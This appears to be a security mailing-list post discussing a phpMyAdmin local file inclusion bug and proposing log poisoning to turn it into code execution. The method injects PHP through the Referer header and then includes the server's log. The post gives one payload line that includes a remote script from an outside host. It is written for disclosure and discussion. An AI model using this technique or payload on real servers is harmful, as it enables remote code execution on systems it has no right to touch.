hi, this is a comment on the recent phpmyadmin vulnerability[1] discovered by maksymilian arciemowicz. i didn't really know where to post this, so i hope this is the right place. anyway, since i've used a file inclusion vulnerability in an older version of phpmyadmin as a starting point for a security analysis last weekend, and came up with a rather simple idea of how to use it for unprivileged script execution of remote php code, i thought i'd post this here. actually i think this method could be used on any php-based local include vuln, so i was wondering why i couldn't yet find anything about it on the net... okay, the problem with local file vulns is of course, that the contents of the file being read are not evaluated. but given php's include statement the are -- if they contain a valid php statement. now instead of trying to upload a file containing php code (which wasn't possible in my case), i ask myself if there was a way to use the server to create it for me? the idea that hit me before falling asleep was to send the code i needed (like <?php include('http://xx.xx.xx.xx/script.php'); ?>) via the referer string, this way having the web server write it into a file for me, and in a second step simply use the already existent local file vuln to read and the server's log file and this way execute the code. of course this method doesn't always work. php mustn't run in safe mode, the web server has to log referer strings and the log files must be accessible after privileges have been dropped. since most people are logging in combined format, i guess the last requirement is the most critical one, but many logs are world-readable nevertheless. also, enabled url-based includes make things easier, but they're not stricly necessary. so, provided with a php local file vuln and readable log files, executing arbitrary commands comes down to locating a suitable log file to include. with a little guessing and the ability to read files (i.e. the server configuration) this is not too difficult. that's it. any comments and feedback about this is most welcome, especially since this approach seems much too simple to not having been used before. maybe someone can just point me to an already existing discussion about this... :) regards, andi [1] http://www.securityfocus.com/bid/15053 -- zeidler it consulting - http://zitc.de/ - info@xxxxxxx karl-kunger-str 59 - 12435 berlin - telefon +49 30 25563779 keine softwarepatente in europa! - http://noepatents.eu.org/
Attachment:
signature.asc
Description: Digital signature